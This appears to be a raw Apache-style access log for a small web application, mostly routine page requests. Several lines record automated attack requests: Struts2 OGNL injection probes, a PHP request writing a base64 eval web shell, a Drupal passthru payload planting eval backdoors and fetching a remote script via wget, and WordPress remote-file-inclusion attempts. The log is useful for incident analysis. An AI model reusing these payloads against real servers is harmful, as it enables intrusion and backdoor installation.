127.0.0.1 - - [13/Apr/2019:00:56:15 -0400] "GET / HTTP/1.1" 302 - 209.17.97.106 - - [13/Apr/2019:01:28:28 -0400] "GET / HTTP/1.1" 302 - 111.206.52.124 - - [13/Apr/2019:02:36:09 -0400] "-" 400 - 209.17.97.42 - - [13/Apr/2019:02:49:16 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:03:01:29 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:03:01:29 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [13/Apr/2019:03:01:33 -0400] "GET /images/favicon.ico HTTP/1.1" 200 1150 185.53.91.24 - - [13/Apr/2019:03:22:31 -0400] "GET /admin/assets/js/views/login.js HTTP/1.1" 200 2137 209.17.96.202 - - [13/Apr/2019:05:52:58 -0400] "GET / HTTP/1.1" 302 - 209.17.96.202 - - [13/Apr/2019:06:07:27 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:06:13:52 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:06:13:53 -0400] "GET /login HTTP/1.1" 200 4162 23.102.51.95 - - [13/Apr/2019:06:28:28 -0400] "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action HTTP/1.1" 200 2137 23.102.51.95 - - [13/Apr/2019:06:28:29 -0400] "POST /index.action HTTP/1.1" 302 - 23.102.51.95 - - [13/Apr/2019:06:28:29 -0400] "POST /index.action HTTP/1.1" 302 - 23.102.51.95 - - [13/Apr/2019:06:28:29 -0400] "POST /index.action HTTP/1.1" 302 - 23.102.51.95 - - [13/Apr/2019:06:28:29 -0400] "POST /index.action HTTP/1.1" 302 - 23.102.51.95 - - [13/Apr/2019:06:28:29 -0400] "POST /index.action HTTP/1.1" 302 - 23.102.51.95 - - [13/Apr/2019:06:28:29 -0400] "POST /index.action HTTP/1.1" 302 - 23.102.51.95 - - [13/Apr/2019:06:28:29 -0400] "POST /index.action HTTP/1.1" 302 - 23.102.51.95 - - [13/Apr/2019:06:28:30 -0400] "POST /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/login.action HTTP/1.1" 200 2137 23.102.51.95 - - [13/Apr/2019:06:28:30 -0400] "POST /login.action HTTP/1.1" 302 - 23.102.51.95 - - [13/Apr/2019:06:28:30 -0400] "POST /login.action HTTP/1.1" 302 - 23.102.51.95 - - [13/Apr/2019:06:28:30 -0400] "POST /login.action HTTP/1.1" 302 - 23.102.51.95 - - [13/Apr/2019:06:28:30 -0400] "POST /login.action HTTP/1.1" 302 - 23.102.51.95 - - [13/Apr/2019:06:28:31 -0400] "POST /login.action HTTP/1.1" 302 - 23.102.51.95 - - [13/Apr/2019:06:28:31 -0400] "POST /login.action HTTP/1.1" 302 - 23.102.51.95 - - [13/Apr/2019:06:28:31 -0400] "POST /login.action HTTP/1.1" 302 - 209.17.97.18 - - [13/Apr/2019:06:38:44 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:09:29:14 -0400] "GET /user/register/ HTTP/1.1" 200 2137 127.0.0.1 - - [13/Apr/2019:09:29:15 -0400] "GET / HTTP/1.1" 302 - 111.206.52.124 - - [13/Apr/2019:10:15:23 -0400] "-" 400 - 127.0.0.1 - - [13/Apr/2019:13:24:50 -0400] "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:13:24:51 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [13/Apr/2019:13:24:51 -0400] "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:13:24:52 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [13/Apr/2019:13:24:53 -0400] "GET /webconfig.txt.php HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:13:24:54 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [13/Apr/2019:13:24:55 -0400] "POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:13:24:55 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [13/Apr/2019:13:24:57 -0400] "POST /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://bearxcat.com//wp-includes/css/help.txt&wpaa=echo%20%22h1loo1%22; HTTP/1.1" 200 2137 127.0.0.1 - - [13/Apr/2019:13:24:58 -0400] "POST /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://www.klenzpro.com/wp-content/uploads/2017/03/sold_out.txt&wpaa=echo%20%22h1loo1%22; HTTP/1.1" 200 2137 127.0.0.1 - - [13/Apr/2019:13:24:59 -0400] "POST /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://www.tekmat.net/wp-content/uploads/2014/04/jpg.txt&wpaa=phpinfo(); HTTP/1.1" 200 2137 127.0.0.1 - - [13/Apr/2019:14:50:24 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:14:50:25 -0400] "GET /images/eLibrary%20Pro%20Logo%20-%20Powered%20by%203.png HTTP/1.1" 304 - 127.0.0.1 - - [13/Apr/2019:17:52:31 -0400] "HEAD /login HTTP/1.1" 200 - 127.0.0.1 - - [13/Apr/2019:18:25:50 -0400] "HEAD /login HTTP/1.1" 200 - 127.0.0.1 - - [13/Apr/2019:18:46:05 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:18:46:05 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [13/Apr/2019:20:38:08 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:20:38:08 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [13/Apr/2019:20:38:08 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:20:38:09 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [13/Apr/2019:20:45:18 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:20:45:26 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [13/Apr/2019:21:07:59 -0400] "GET /robots.txt HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:21:07:59 -0400] "GET /login HTTP/1.1" 200 4162 127.0.0.1 - - [13/Apr/2019:21:07:59 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:22:31:09 -0400] "GET / HTTP/1.1" 302 - 127.0.0.1 - - [13/Apr/2019:22:31:09 -0400] "GET /login HTTP/1.1" 200 4162